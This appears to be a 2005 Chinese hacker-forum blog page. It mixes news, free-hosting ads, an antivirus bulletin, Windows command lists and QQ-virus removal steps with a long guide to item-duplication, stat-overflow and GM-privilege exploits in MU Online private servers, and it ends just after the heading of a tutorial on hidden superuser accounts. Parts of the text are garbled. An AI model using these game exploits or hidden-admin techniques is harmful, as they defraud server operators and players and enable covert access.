黑客[中国]联盟
===========================================================
热烈祝贺CCU综合论坛正式公布!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
===========================================================

热烈祝贺CCU综合论坛正式公布!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

黑客,电脑,技术,编程,设计,文学,诗歌,免费资源,音乐,美术,动漫^

一切尽在CCU综合论坛!!!!

CCU综合论坛-------为打造成中国第一综合论坛而努力!!!!

斑竹火热招募中................

详情请登陆 http://www.ccu.gov.cn


lingsui521 发表于:2005.10.02 02:29 ::分类: ( 最新信息 ) ::阅读:(26461次) :: 评论 (13)
===========================================================
免费空间申请!!~!~@@
===========================================================

绝对好用的免费国外PHP+WYSQL空间

原199M 现在可能是99M

可绑定顶级玉米

完全自主管理的数据库

功能齐全的管理后台

真是极品啊

美中不足的是有广告(放在顶部的)

速度还可以

主要的是免费的哦

而且能免费使用到2015年哦

心动不如行动

快快行动吧

申请地址:http://www.ccu.gov.cn 技术资源区--免费资源版


lingsui521 发表于:2005.10.02 02:27 ::分类: ( 最新信息 ) ::阅读:(28057次) :: 评论 (11)
===========================================================
请注意!!!
===========================================================
“华人地带”网站诚邀有识之士和有能之才加入网站开发建设行列, 有意者请附上个人简历、专业说明及联系方式,发送到QQ:114804437 给我一个支点, 我就能撬动地球; 给我一次机会, 我就会让世界震惊! 自信可改变未来! 让我们携手共创辉煌明天! --------华人地带 宣
lingsui521 发表于:2005.05.28 18:55 ::分类: ( 最新信息 ) ::阅读:(66056次) :: 评论 (39)
===========================================================
Google“封杀”hao123 百度已发出“沟通函”
===========================================================
全球最大的搜索引擎Google上竟然找不到中国知名分类网址网站hao123的链接。昨天,记者在Google上遇到了这个怪现象,hao123网站的所有者百度公司表示,已经就此向Google发出了“沟通函”询问原因。

  昨天下午,当记者在Google上以“hao123”为关键词进行搜索时,竟然找不到这个国内知名分类网址网站的链接,之后记者尝试采用搜狗、中搜等国内其他搜索引擎搜索,hao123网站链接都出现在搜索结果的首页头条。

  据了解,hao123原本是国内著名个人网站,半年前由百度公司出资5000万元买下,专门为用户提供网址链接服务,目前该网站流量排名全球第15名。百度方面在接受记者采访时表示,他们也已经发现了这种异常情况,并已经向Goolge发出“沟通函”询问其中原因。耐人寻味的是,业界近日刚刚传出Google将设立中国办事处的说法,而此前著名调查公司艾瑞发布报告显示,在英文市场所向披靡的Google在中文搜索市场已经排在百度和雅虎之后。针对业内人士猜测这可能是Google出于中国市场竞争考虑,牺牲一直引以为傲的中立性来屏蔽对手网站的说法,由于Google目前在国内还没有公开的代表机构,记者目前尚未与Google取得联系。


lingsui521 发表于:2005.05.21 09:18 ::分类: ( 最新信息 ) ::阅读:(22295次) :: 评论 (6)
===========================================================
瑞星公司05月20日发布 每日计算机病毒及木马播报
===========================================================
据瑞星全球反病毒监测网介绍,今日有一个病毒特别值得注意,它是:“新CIH(Win32.Yami)”病毒。该病毒与CIH类似,通过感染可执行文件进行传播。病毒发作后会破坏硬盘数据和主板BIOS,造成用户的计算机无法启动,用户数据丢失。

本日热门病毒:

“新CIH(Win32.Yami)”病毒:警惕程度★★★★,文件型病毒,通过感染Windows可执行文件传播,依赖系统:WIN2000/XP。

“新CIH(Win32.Yami)”病毒会驻留在系统内核。病毒判断打开的文件是否为Windows可执行文件(PE)文件,如果不是则不进行感染操作,是则将病毒插入到PE文件各节的空隙中(与传统的CIH一样),所以,感染后文件长度不会增加。由于病毒自身的原因,感染时有些文件会被损坏,导致不能正常运行。它发作时将企图用“YM Kill You”字符串信息覆盖系统硬盘,并且使数据恢复相当困难。它同时通过向主板BIOS中写入垃圾数据来对硬件系统进行永久性破坏。“新CIH”病毒与CIH相比可以传染Win2000/XP系统,具有更强的传染性。

反病毒专家建议:建立良好的安全习惯,不打开可疑邮件和可疑网站;关闭或删除系统中不需要的服务;很多病毒利用漏洞传播,一定要及时给系统打补丁;安装专业的防毒软件进行实时监控,平时上网的时候一定要打开防病毒软件的实时监控功能。

如遇病毒,请拨打反病毒急救电话:010-82678800或访问瑞星反病毒资讯网:http://www.rising.com.cn。

lingsui521 发表于:2005.05.21 09:17 ::分类: ( 最新信息 ) ::阅读:(39704次) :: 评论 (3)
===========================================================
日本政府称有44名日本国民户籍设于钓鱼岛及竹岛
===========================================================
中新网5月18日电日本政府17日表示,有18名日本国民的户籍设于钓鱼岛,另有26名日本国民设籍于竹岛。

据台湾媒体发自东京的报道,日本和中国之间对钓鱼岛的领土归属,存有长期的争议;日本和韩国之间,对竹岛的主权问题,也有强烈争执。如今日本政府公开指称,这两处岛上都有日人登记户籍,是否会激化中韩两国的反应,值得观察。

日本政府17日接受在野的民主党众议院议员岩国哲人书面提问时,针对这些争议岛屿的住民问题,做上述回答。日本政府同时指出,这些人的籍贯虽设在各个岛上,但各岛上“并没有人”实际居住。

而韩国媒体曾报道,韩国国会议员准备将籍贯地迁至竹岛(韩国称独岛)。为此,日本政府说,日方已向韩国要求确认情况,如果属实,日本政府将要求韩方取消这项户籍迁移登记。


lingsui521 发表于:2005.05.21 09:16 ::分类: ( 最新信息 ) ::阅读:(93697次) :: 评论 (31)
===========================================================
超大免费空间!
===========================================================
免费200M到600M 空间支持:ASP,FTP,PHP,FSO等全能型空间 网通家家信息站 www.WTJJ.INFO 申请时请帮忙填下偶的名字:114804437 很容易申请的。谢谢大家帮顶下。 空间大小:200M到600M 空间支持:ASP,FTP,PHP,FSO等全能型空间 时间:免费使用到2007年5月1日 注:本次网站推广,主要是为热爱建站或已有网站并有一定流量的网友们提供空间 机会难得,请不要恶意申请!系统设置相同ip每天只可以申请一次。 网通家家信息站欢迎您 www.WTJJ.INFO
lingsui521 发表于:2005.05.07 00:38 ::分类: ( 最新信息 ) ::阅读:(14248次) :: 评论 (2)
===========================================================
开始→运行集锦!
===========================================================
开始→运行→输入的命令集锦 mstsc--远程桌面连接 logoff--注销命令 rononce -p --15秒关机 tsshutdn--60秒倒计时关机命令 iexpress--木马捆绑工具,系统自带 tourstart--xp简介(安装完成后出现的漫游xp程序) winchat--XP自带局域网聊天 sndrec32--录音机 Nslookup--IP地址侦测器 explorer--打开资源管理器 lusrmgr.msc--本机用户和组 services.msc---本地服务设置 oobe/msoobe /a--检查XP是否激活 notepad---打开记事本 cleanmgr--**整理 net start messenger--开始信使服务 compmgmt.msc---计算机管理 net stop messenger---停止信使服务 conf----启动 netmeeting dvdplay---DVD播放器 charmap---启动字符映射表 diskmgmt.msc---磁盘管理实用程序 calc----启动计算器 dfrg.msc--磁盘碎片整理程序 chkdsk.exe---Chkdsk磁盘检查 devmgmt.msc--- 设备管理器 regsvr32 /u *.dll--停止dll文件运行 drwtsn32---- 系统医生 rononce -p --15秒关机 dxdiag----检查DirectX信息 regedt32--注册表编辑器 Msconfig.exe---系统配置实用程序 rsop.msc--组策略结果集 mem.exe---显示内存使用情况 regedit.exe--注册表 progman---程序管理器 winmsd----系统信息 perfmon.msc--计算机性能监测程序 winver----检查Windows版本 sfc /scannow---扫描错误并复原 taskmgr---任务管理器(2000/xp/2003) wmimgmt.msc--打开windows管理体系结构(WMI) wupdmgr---windows更新程序 w脚本---windows脚本宿主设置 write-----写字板 winmsd----系统信息 wiaacmgr--扫描仪和照相机向导 mem.exe---显示内存使用情况 Msconfig.exe---系统配置实用程序 mplayer2--简易widnows media player mspaint---画图板 mplayer2--媒体播放机 magnify---放大镜实用程序 mmc-----打开控制台 mobsync---同步命令 dxdiag----检查DirectX信息 drwtsn32---- 系统医生 devmgmt.msc--- 设备管理器 dfrg.msc--磁盘碎片整理程序 diskmgmt.msc---磁盘管理实用程序 dcomcnfg--打开系统组件服务 ddeshare--打开DDE共享设置 dvdplay---DVD播放器 net stop messenger---停止信使服务 net start messenger--开始信使服务 notepad---打开记事本 nslookup--网络管理的工具向导 ntbackup--系统备份和还原 narrator--屏幕“讲述人” ntmsmgr.msc--移动存储管理器 ntmsoprq.msc---移动存储管理员操作请求 netstat -an--(TC)命令检查接口 syncapp---创建一个公文包 sysedit---系统配置编辑器 sigverif--文件签名验证程序 sndrec32--录音机 shrpubw---创建共享文件夹 secpol.msc---本地安全策略 syskey----系统加密,一旦加密就不能解开,保护windows xp系统的双重密码 services.msc---本地服务设置 Sndvol32--音量控制程序 sfc.exe---系统文件检查器 sfc /scannow---windows文件保护 taskmgr---任务管理器 eventvwr--事件查看器 eudcedit--造字程序 explorer--打开资源管理器 packager--对象包装程序 perfmon.msc--计算机性能监测程序 progman---程序管理器 regedit.exe--注册表 rsop.msc--组策略结果集 regedt32--注册表编辑器 regsvr32 /u *.dll--停止dll文件运行 regsvr32 /u zipfldr.dll----取消ZIP支持 cmd.exe---CMD命令提示符 chkdsk.exe---Chkdsk磁盘检查 certmgr.msc--证书管理实用程序 calc----启动计算器 charmap---启动字符映射表 cliconfg--SQL SERVER 客户端网络实用程序 Clipbrd---剪贴板查看器 conf----启动netmeeting compmgmt.msc---计算机管理 cleanmgr--**整理 ciadv.msc----索引服务程序 osk-----打开屏幕键盘 odbcad32--ODBC数据源管理器 oobe/msoobe /a--检查XP是否激活 lusrmgr.msc--本机用户和组 Nslookup--IP地址侦测器 fsmgmt.msc---共享文件夹管理器 utilman---辅助工具管理器 gpedit.msc---组策略
lingsui521 发表于:2005.05.06 22:15 ::分类: ( 实用技术 ) ::阅读:(50941次) :: 评论 (32)
===========================================================
最新QQ病毒手动杀毒方法
===========================================================
最近老是有朋友。给我说这样那样的Q病毒。自动发送文件的病毒。 这种病毒连独孤剑客的QQ病毒专杀工具都不能解决。因为他不算长驻内存的。 研究了一下,其实也比较简单。 *手动删除病毒* 1.查找进程rundll32.exe k掉 2.如果有 .exe(注意是一个特殊字符不是空格)进程,k掉 3.定位[HKEY_LOCAL_MACHINESOFTWAREClassestxtfileshellopencommand] 改默认键值为 "notepad %1" (注意前面没有那个类似于空格的特殊字符) 4.定位[HKEY_LOCAL_MACHINESOFTWAREClassesexefileshellopencommand] 改默认键值为 "%1" %* (注意前面没有那个类似于空格的特殊字符) 5.定位[HKEY_LOCAL_MACHINESOFTWARETENCENTQQ] 得到你的qq目录,再转到你的qq目录下 可发现 有两个文件 TIMPlatform.exe TIMP1atform.exe (注意是1不是L) 删除TIMPlatform.exe(病毒,为winrar图标),把TIMP1atform.exe改名为TIMPlatform.exe 6.病毒文件删除,下面是要删除的病毒文件(都为winrar图标),假设windows目录为c:winnt c:winntsystemrundll32.exe c:winntsystem32.exe c:winntsystem32notepad.exe *为你的系统打上此病毒"补丁"* 打此补丁后以后不会再中此病毒 定位注册表项(没有则新建) HKEY_LOCAL_MACHINESOFTWAREClassesMSipv 添加一键值 MainVer 类型为REG_DWORD,值为ffffffff(16进制) 病毒启动判断状态参数完毕后会查询此值,如当前版本值比它小则会弹出个对话框就退出。 我得到的病毒版本值为505
lingsui521 发表于:2005.04.27 20:28 ::分类: ( 实用技术 ) ::阅读:(21476次) :: 评论 (24)
===========================================================
菜鸟电脑操作技巧60招
===========================================================
 1.如果同时有多个窗口打开,想要关闭的话,可以按住shift不放然后点击窗口右上角的关闭图标.   

  2.在保存网页前,可以按一下"ESC"键(或脱机工作)再保存,这4婧芸?   

  3.用电脑听CD可以不用任何的播放软件,把音箱线直接接到光驱的耳机孔,放入CD,按光驱上的play键就可以直接听了,这样听歌可以不占用系统资源。(如果你的电脑坏了,不能启动或什么的,一时放在那不能修,千万不要浪费资源,把用里面的电源给光驱通上电,就可以暂时做CD机了.   

  4.MSN中发消息的时候是按enter的,如果想要换行而不想发出消息,可以 shift+enter或ctrl+enter   

  5.浏览器的地址栏里可以调试简短的HTML代码。方法如下:地址栏写 about :abc 回车,就看到效果了.   

  6.Windows快捷键:

  win+m 显示桌面

  win+pause 系统属性

  快速重新启动:按确定前先按shift(不适用于2k、xp).

  彻底删除:shift+del

  不让光盘自动运行:按shift

  Ctrl+Esc:相当于"开始"或WIN键

  Ctrl+Home:将游标移至文字编辑区的开始始(Home单用:移至列首)

  Ctrl+End:将光标移至文字编辑区的终点(End单用:移至列尾)

  Alt+F4:关闭当前视窗(若是点一下桌面再按则为关机)

  F2:更改名称

  windows+e 资源管理器.

  windows+r 运行.

  windows+f 查找.

  windows+u 关闭系统.

  windows+d最小化所有窗口,再按一次Win+D可回到最小化前的窗口.

  windows+m最小化所有窗口,但再按一次无法回到最小化前的窗口.

  Shift+F10,可以打开所选项目的右键菜单.

  按住 CTRL+SHIFT 拖动文件:创建快捷方式.   

  7.关机快捷方式

  (1). 在桌面空白位置按鼠标右键 -> <新建> -> 选<快捷方式>

  (2). 在<指令行>键入 rundll.exe user.exe,exitwindows

  (3). 在<选择快捷方式 的名称>键入<关闭Window>或你想要的名称 -> 按<完成 >   

  8.重新启动快捷方式

  (1). 重复以上 (1)

  (2). 在<指令行>键入 rundll.exe user.exe,exitwindow***ec

  (3). 在<选择快捷方式的名称>键入<重新启动Restart>或你想要的名称 -> 按< 完成>   

  9.RUN - > cmd 或者command

  就会看到DOS窗口。不知道大家注意到那个小小的图标没有,在左上角。

  点击这个图标, 就会看到下拉菜单, 尤其是Edit下的一些功能, 很方便   

  10.con、nul是MS系统的保留名,它不能做为文件名!检查你的web空间是不是M 系统,可以建一个con的文件夹试试

        11.想把自己的某个文件夹的文件做一个列表? 用什么软件呢? 不用,直接在命令 行下输入 "tree /f > index.txt".打开index.txt看一下是不是一目了然   

  12.保存无边窗口页面请用CTRL+N新开窗口

  13.如果一个文件夹下有很多文件,如果想快速找到想要的文件,先随便选择一个 文件,然后在键盘上选择想要的文件的第一个字母就可以了   

  14.说个QQ隐身登陆的笨办法:

  在网吧上网,如果直接从注册向导登陆的话QQ是上线登陆的,可是有时候却不 希望现身,怎样实现隐身登陆呢?

  就是拿一个没用的QQ先从注册向导登陆了,选择状态为隐身,然后在系统参数 中选中以隐身方式登陆,点确定,然后直接在这个QQ上运行注册向导登陆你要 登陆的QQ,你会发现现在QQ是隐身的了。

  15.win98改ip不重启的办法:

  1.改完ip选择取消。

  2.在设备管理器里禁用改了ip的那块网卡。

  3.启用网卡。

  ok,你改的ip已经可以用了   

  16.2000和xp下运行"cmd",进入dos窗口,复制和粘贴都用右键完成   

  17.收藏夹不要放在系统盘,以免忘了备份,每次装完系统用"超级魔法兔子“指 定路径   

  18.对于系统不明白的地方,平时多看windows自带的帮助,不要盲目去找人解决 ,也许帮助才是最快和最全的。(其余软件也是同理)   

  19.winxp自带批量重命名功能,只要选中一堆文件,选重命名,然后改第一个文 件,改完后,其他文件也会自动修改

  20.上网时在地址栏内输入网址,系统会记录下来,虽然方便以后不用再重复,不 过如果是公用的机子,又不想让别人知道自己到过哪些地方,可以用“CTRL+ O(字母O,不是0)”,这时对弹出一个“打开”对话框,在其中的地址栏内 输入网址,就不会被记录下来了.


lingsui521 发表于:2005.04.26 21:20 ::分类: ( 推荐文章 ) ::阅读:(54328次) :: 评论 (8)
===========================================================
最新奇迹私服复制漏洞大全(含98c)
===========================================================
声明:照本文做后出现数据溢出、删档等后果,本站一概不负责!
0.98版本漏洞
=======★★★关于0.98c的复制方法★★★=====
复制必须要两个人,假如主角是A 对方是B
A按ESC键 B交易A 交易两次 第二次交易要在第一次交易取消以后 等B交易完之后 A先点OK 再点取消 然后把要复制的东西放入仓库 接着A回来交易B
B点OK A走开 复制成功 你会发现你放到仓库的东西又重新出现在你的包裹里 注意:不要把复制的东西和真品同时放在包裹或者仓库,不然后果不堪设想 不信你们自己可以试试 如果有人知道0.98c怎么刷卓越全属性装备请加我QQ8549128请告之,谢谢!

三连击

决斗系统所设定的60%普通攻击有效,再加上战士COMBO的三连击
想想是多么恐怖,一个天地十字剑+霹雳回旋+袭风刺(双重伤害),最后附加激活的combo总攻击。能上1000的伤害。当然不一定在使用的过程中能全部打中,因为对方可以跑
但是如果他跑的话,他就根本没办法打死你。
而其他职业只能继续保持原来的攻击方式,因为只有60%的攻击力,所以对于上1000血的+11黑凤凰战士只能是隔靴挠痒!
法师瞬移PK,那根本就打不死人!
精灵的冰封有点威胁!
战魔根本咬不动!

三连击图

决斗系统最大受益者-战士!
最后的一击太猛了!没上千血的被最后一击打中,必死!
另外,霹雳回旋变弱了,以前对在身边的怪物用霹雳,会有2个伤害,现在只有一个了。

的确是个很大的BUG.袭风刺现在的威力很大.消耗的技能值变少好多,几乎可以无限使用.有时是2次伤害3次伤害..稍微强点的战士赶快去城堡和敏弓枪城堡任务吧.袭风刺一定不会让你们失望的~~

☆版主提示:或许有人问3连击是怎么设定的?是你使用的武器本身技能+霹雳回旋+袭风刺或雷霆~来设定的

===============================★★★0.98C复制方法★★★================(此法适合官方,强烈推荐)

本站声明:因复制出现数据溢出、删档等后果,本站一概不负责!相关技术问题请咨询作者或到留言板留言!


关于用99复制的问题99可以实现2次交易,不用和任何人说话的,B交易A,A用99奇迹,等B屏幕上显示交易取消的时候B再交易A,然后A点确定,就可以了,B把要复制的东西存仓库,但是现在问题就出现在这里了,我也不知道怎么办,大家研究下,问题就是B不能和别人交易了,即使A交易B,B点了确定,还是取消了交易,哎,还欠东风,大家想想办法啊,大家共享一下嘛~别小气哦

0.97-0.97D版本漏洞

==============★★★0.97以及旧版本,复制方法★★★=========

要复制物品者为A,补助设置者为B,必须可以用0.97版外挂方可使用复制方法
1:A去仙踪林,点卡隆出现对话
2:B一直交易A,并且要快,一直到A那出现交易提示。这时A选确认,不过还有个交易提示,第2个要选取消。A取消交易界面,但是B的交易栏必须还在,否则失败。
3:A取消交易,B不要取消交易,也不要动,B的交易栏还在的。这时A取消交易后就能动了,去仓库,把A要复制的东西存进去。
5:回去交易B,B点确认,然后A或B取消交易,复制成功
(点守卫,大天使使者,咔隆,都能复制)

0.97以前版本物品复制方法II:
1:A去仙踪林,点玛雅葛布林交易,出现对话框按V
2:B交易A,等到A那出现交易取消。在交易A(要快!)这时A选确认,不过还有个交易提示,第2个要选取消。A先取消交易,然后B再取消交易
3:这时A取消交易后就能动了,去仓库,把A要复制的东西存进去。
4:回去交易B,A,B同时确认就OK了.
其实可以同步的,B把要复制的东西放在身上在第2步完成后把要复制的东西放进仓库,然后和A确定.这就是2个人同时复制,效率提高!

关于奇迹私服复制问题解答:

1:复制物品是不需要开外挂的,只要不是0.97B都能复制
2:如果GM大概物品检测,你复制东西动了掉线,请卖到商店。
3;并不是什么物品都检测到的,大部分是无法检测到~!
===★玩家01036的另类复制方法:

方法一:A,B。 A交易B,B不要确定,访问卡隆的同时,A再交易B,A点确定。然后放些垃圾在交易栏上。A不要点取消,开仓库,B访问卡隆,A把东西放进去,走两步,再看看身上,复制成功。这是回档法复制!
方法二:注册两个中文账号,账号为10个中文,同时登陆服务器,两个仓库是一样的。
方法三:两个人利用交易超时。。。我也不是很清楚知道的补充一下。
希望大家不要太自私,出现了问题,不要逃避,让大家来共同研究,共同解决。

================★★★杀人不红名★★★==作者:永恒的法师

在盟战结束后.可以继续杀对方盟里的人而不会红名=
比如 我方以20:10赢了对方后..杀一次对方盟主.分数变成22:10, 战盟的SCORE也会再+1..可以一直杀几次(时间不能太长)

================★★★GM命令★★★=====

此方法因个别私服而异=本页下面有GM命令最新资料
我就知道几个啊 ,大家别笑话(设定GM是A, 一普通玩家为B):
1。/追踪 B=奇迹漏洞网http://allbug.xicp.net提供
2。/move A(或者B) 3 15 15 :3 代表地图仙踪林,15 15是一个坐标
我只知道地下的代码是1,冰的代码好象是2。城堡的 代码分别是11,12,13,14,15,16
3。!大家好 为发表公告:大家好
补充:GM的移动指令为 /移动 本人名字 地图代码 众坐标 横坐标

================★★★转生漏洞★★★===

最近玩东方的时候无意中发现了一个无限点数的BUG,找一个可以在线加点的SF,等点数够在线加点时候,下线,进入在线加点程序,分配好点数,然后就狂点提交,注意,不要点的太多,太多了回变负数的,好象是3W以上就变负数,我朋友试过,我一发现这个BUG后,就马上练了个小号,让朋友带我进了次血城,出来后就刷点,才一个小时,20000的敏捷,25000的智力,血你怎么杀都杀不完的超级BT妹妹就出来了,哈哈~~~天魔都打不动我,不过才玩了一天,我的帐号就封了,有风险,各位想玩,就再注册个小号玩玩吧,

==============★★★法师穿MM装备衣服漏洞★★★=====

首先你必须有个华人外挂!接着你用自动登入先登入一个人物(角色1),接着在自动登陆里换人物(角色2),点回到角色画面外挂自动登上去!想让别的职业穿不同的装备 前提是 角色1和角色2不同职业!可以用这个漏洞让1级的新人可以M别人 可以交易嘿嘿!

================★★★马和彩云兽的小漏洞★★★=====

有的私服没有卖马和彩云兽的吧!还有玛雅比较贵!
这样自己合成个彩云兽死了!就太浪费了!如果你那的祝福灵魂比较便宜那!那就好办了!先把彩云去血,一般去8点血以上就行了~
然后做个阴影点彩云~彩云每+1彩云的血就会比以前多了1点血点到+7~去他8点血足够了吧!当然去多了也没事只要不死就行了!然后你那去使用吧!只要彩云不死我们就能让他加血!你看到彩云少与7点血的时候~再去做个阴影~用灵魂点暴他~变+0的~彩云是不是有变很多血了那?
还有如果你感觉彩云的属性不好用生命贴吧!就是没有属性的也能贴出属性来!!属性感觉不好就继续贴贴到喜欢的属性为止!!!!
PS:做阴影其实很简单!只要你机器不卡!私服卡不卡没关系!不卡更好!你去买个能点祝福的东西!把东西卖了的时候迅速点回物品所在的地方!一定要点原来在你背包的为止点正一点不错啊!100%能做出阴影!!
没事你点点恶魔看看+7的比较好看点~亮了一点~但必须要先去他8点血啊!

==============★★★法师的无敌守护+血法★★★====

前提是守护够140%(具体多少我不太清楚,140肯定行)吸收伤害,给自己+上守护后找人狂打你,会发现你的血量激增(我的没有+过体力的法师,被朋友用爆炎砸到了14万血)这个时候就可以轻易的杀死反射战士了。具体你现在有多少血要从你的组队看(P键打开)。在你杀人的时候,可以叫朋友不停的攻击你,因为这种血两的增加是暂时的,很快回消失。另外同理,你也可以给朋友套个守护再一直攻击他,把你的朋友也变成超级血牛。
==============★★★法师反射杀人法★★★==作者:拎壶冲

法师反射杀人法(此方法纯属朋友口述,没有尝试)140%的伤害吸收守护,要求至少有5000敏捷,5000智力。穿全套的反射革装,带的首饰不能带回血,另外要求有一定的血量。套上守护以后。任由别人打你。自己不受伤害,对手却要受到反射。

☆版主的话:次漏洞尚没通过完全验证,望测试得到的朋友到论坛发贴

=============★★★几个小漏洞发现★★★==

据作者君然了解到:点门票那个和魔剑士那个就是到了98也应该可以用
1,魔剑士用能量球:有变身功能的服,现在转成法师然后转魔魔就会能量球了
2,万能门票:用个幸运的东西做影子把门票点到9就变+0的了(万能!)
3,新翅膀合成100%:在服务器最卡的时候合,最好是随便合个东西都要闪2,3分钟的时候合成是不会失败的(我在龙之魄21%的成功率就合了 97版的时候合的)
不过不出好属性不知道为什么

==============★★★GM代码和相关内容★★==


打开SQL中表character,更改你的人物的 CtlCode值为 8,就是GM号了
设置了GM号,想自己移动就输入/move GM名字 地图编号 X坐标 Y坐标就行了。例如移动去勇者大陆
/move 我是GM 0 100 100,就是把我是GM移动到勇者大陆100,100的坐标。
CtlCode代码的意义
0 普通角色(此角色可以使用)
1 被封角色(此角色无*使用)
2 物品角色(此角色可以使用,但身上物品无*转移)
4 隐形角色(此角色可以使用,只有自己看着隐形,别人能看见)
8 管理员角色(此角色可以使用,具有管理员权限,可以用GM命令)
(转自wily2000,感谢)


GM代码

其他的代码只是这些代码的组合,如6=2+4(无*转移物品的隐型角色),10=8+2(无*转移物品的管理员角色),12=4+8(隐型的管理员角色),14=2+4+8(无*转移物品的隐型管理员角色)

/停权
/解除停权
/guidemove 战盟移动 /GuildMove 战盟名称 地图编号 坐标X 坐标Y
用*和/move一样,但这个是把当前在线的战盟成员全部移动到你指定的地方,这样,GM就可以把两个盟的人召集在一起,在你的监督下进行盟战或其它活动了!(谢谢ydll)
/guideend 战盟禁止
/warend 战斗结束
/制造 (用*未知)
/连线状态 (显示在线人数) /连线状态 等级-等级
/追踪 移动到人物身边 /追踪 名字
/监视 显示为乱码 /监视 名字
/Disconnect 断开连接(踢人)
/Move 移动任意角色到指定位置 /Move 名字 地图编号 坐标X 坐标Y
// 地图号: 0:勇者大陆, 1:地下城, 2:冰风谷, 3:仙踪林, 4:失落之塔, 5:未知地图(move会出错), 6:竞技场, 7:亚特兰蒂斯 8:沙漠 9:恶魔广场 10:天空 11:血色城堡 11血1 12血2 依此类推
/Trans (不明白)
/SetBlock 封号
/UnsetBlock 解封
/DisableChat 禁止聊天
/EnableChat 允许聊天
/GuildMove
/GuildDisconnect 战盟断开
/GuildWarEnd 盟战结束
/GuildWarStart 盟战开始
/GuildWarStop 盟战停止
/Make 制造(用*未知)
/RemainTime 剩余时间

==========★★★外挂飞入罗马竞技场漏洞★★★=========
进入竞技场(/移动 竞技场)后 用外挂移动到 30 40这个地方 就可以进入古战场了 里面好华丽的~用外挂的话 就飞到很大的空白的地方 看到没有烟雾了(机器也不卡了) 就对了不用外挂的话 要2个盟主 开盟战 靠墙 杀了对方可能会传送过去哟

==========★★★MU在线加点N大的BUG★★★=============

大家应该知道以前的在线加点BUG~在前面打上负号就可以了但是这个BUG已经不能用了~经过本人的长时间研究~终于~知道了~

在在线加点的4个格子里每个打.99999 不但不减自己拥有的点数~还各个技能+1唯一缺点~费钱啊。。。。。。。。。。。。。。。。。。。。大家先试试好用不好用~

=========★★★刷祝福碎片方法★★★=====     (某些私服可以使用)

贴这个漏洞时候~唉~已经过时了~不好意思啊~但也得贴出来~~ 方法就是用祝福点奇迹通宝变祝福碎片~方法就是这么简单

===========★★★MM带弓再拿武器的双手漏洞★★★=====

适用与0。98版本以下(0。98私服版本没试过)
确定MM身上装了弓(列如:玛雅神弓 比较靓) 接着准备一把可以使用的单手武器放在道具栏里(列如:雷神之剑 亮。。) 接着找一个人你打/交易(事先说好叫那人什么都别按)接着出现了你向XX提出交易,这时马上按I打开道具栏把装备在身上的神弓拿起别放下,等待申请交易超时自动取消,接着你发现了你的神弓“不见了”(还在!只是你自己看不见) 接着装上事先准备好的单手武器!OK!下线在上登陆人物画面的时候别惊讶! P。S:注意必须是弓类武器放(右边)
必须是单手武器(左边) 此法还可以卡天马 卡小马 可以骑天马放技能(别人看的见) 带翅膀的战士骑天马(卡没了)可以直接放出流星焰
此法最原始的开始于卡盾年代

===========★★★靠墙方向移位漏洞★★★=====

任何版本!
座姿矫正。。。-_-!!
先准备一个变身戒指(骷髅兵的免),在大陆有铁栅栏可以靠上去, 开始分解动作
1。人靠上去
2。带上戒指
3。鼠标朝任意方向摆 主要让自己方向变化
4。取下戒指!
哈哈你的PP对别对着别人哦!

☆版主蓝翼补充:冰的177 34靠门大柱子靠上去居然是空1个格子的

   

=================================★★★0.97B和0.97D的复制方法★★★=====================(推荐)

有3个方法,本站搜索期间比较辛苦,转贴请著名来源网站。这3个方法基本相同,相关技术问题请与作者联系!复制时候建议用这3个方法联合一起~

本站声明:因复制出现数据溢出、删档等后果,本站一概不负责!

第1个方法 (此法支持0.97B的复制)

D版复制方法

要等血色或者广场开门的时候。要2个人。

A。是拿着要复制的装备。帮装备放到包包里,然后点激卡隆或者大天使。等进入广场或者血色的对话框出现了。然后B立刻交易A。A选交易。然后就点激你可以进入的层次。一般都是满人。然后B的画面里就出现了交易栏。A就不用管它。走去仓库,把要复制的东西放进仓库里面。然后B就取消交易。跟着A交易B,出现交易栏之后。A按取消交易。

这样。要复制的装备又在你的包包里出现了。这就成功了。

第2个方法

我的复制也是从别人那学来的,适合0.97D,只要两个人。是很简单的那种,至于我个人
没什么建树(嘿嘿)。我的复制方法是:

在血色或者广场开的5分钟内进行复制,(时间很紧,要抓紧)[前提:进血几要带加几的
披风;进广场嘛,带个加0的卷就可以了]

方法===A带要复制的东西和披风(或卷)点大天使(或卡龙),这个时候出现一个选择进
血色几(或广场)的框,先不要点,这时候由B交易A,A点确定,再进该去的层数,这时
候A会被大天使反弹出来,就马上回仓库,把要复制的东西放仓库,这个期间B不能动,直
到A把要复制的物品存储完毕,然后走动,B交易A,都按确定,A再看包裹,嘿嘿,复制成
功。

切记:原物品和复制品不能放在同一物品框。。。。。。。。

第3个方法

要3个人.假定复制人为A.帮手为B C

血城开门时.A点大天使使者.(身上要有相符的票)出现进入选择时.B交易A.A先OK.这时B上出现交易栏.而A还是进入血城的界面.A点进入的血城层数.这时会被弹出来.有时会乱飞.没事.用移动命令移动一下.然后把要复制的装备放仓库.关闭仓库后.C交易A.A选确定.出现交易栏后.A取消交易..B再取消就行了.整 个过程中.B要一直=到A和C的交易取消后才能点取消.否则会失败.此方法可以刷箱子.我经常打满仓+5箱子.然后再扔.手快可以扔2~3次.当然.我都是到失落这些没人的地方扔了.扔箱子的话 C要先和A组队.方便捡物.只要打一次箱子.永久使用.而且就算开了复制也没用.原本的已经扔了.扔出的物品都是不同的.当然不算是复制品.

也可以刷钱.对关了刷钱的服务器.我是合好几个新飞飞.全点9~16.把放仓库这步换成卖NPC就行了.C一交易取消后.翅又回来了. 不过要注意带的钱的限制.我第一次刷时太狠了.过了20亿.(5个飞.其中一个XY.一个+S其它普通的.)成了负数的钱了..而且卖东东更快.开一次血或广场的5分钟可以卖N次.几个人轮着刷.全成了有钱人

lingsui521 发表于:2005.04.26 21:15 ::分类: ( 黑客教程 ) ::阅读:(7865次) :: 评论 (1)
===========================================================
建立隐藏的超级用户多种方法
===========================================================

建立隐藏的超级用户多种方法

作者:黑客基地 | 文章来源:本站原创 | 点击数:1070 | 更新时间:2005-3-26

一、如何在图形界面建立隐藏的超级用户
